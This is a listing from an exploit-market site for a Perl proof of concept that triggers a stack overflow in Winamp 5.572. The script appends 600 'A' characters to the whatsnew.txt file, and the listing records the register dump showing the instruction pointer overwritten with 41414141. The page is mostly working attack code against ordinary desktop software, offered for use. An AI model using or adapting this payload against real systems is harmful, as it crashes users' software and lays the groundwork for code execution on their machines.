[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Winamp v5.572 whatsnew.txt Stack Overflow PoC

Author
d3b4g
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10167
Category
dos / poc
Date add
24-01-2010
Platform
unsorted
=============================================
Winamp v5.572 whatsnew.txt Stack Overflow PoC
=============================================


# Version: 5.572
# Tested on: Windows xp(sp2)
 
 
#!/usr/bin/perl
 
 
# Replace whatsnew.txt , open Winamp click Help->about winamp-> version history.
# hacking.org.il.
 
#EAX 00000000
#ECX 00000000
#EDX 00661658
#EBX 00000000
#ESP 00B7EDE8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBP 00B7EDFC ASCII "AAAAAAAAAAAAAAAAAAA"
#ESI 00401280 winamp.00401280
#EDI 00000000
#EIP 41414141
 
my $overflow="Winamp 5.572"."A"x600;
 
open(myfile,'>>whatsnew.txt');
 
print myfile $overflow;



#  0day.today [2024-12-24]  #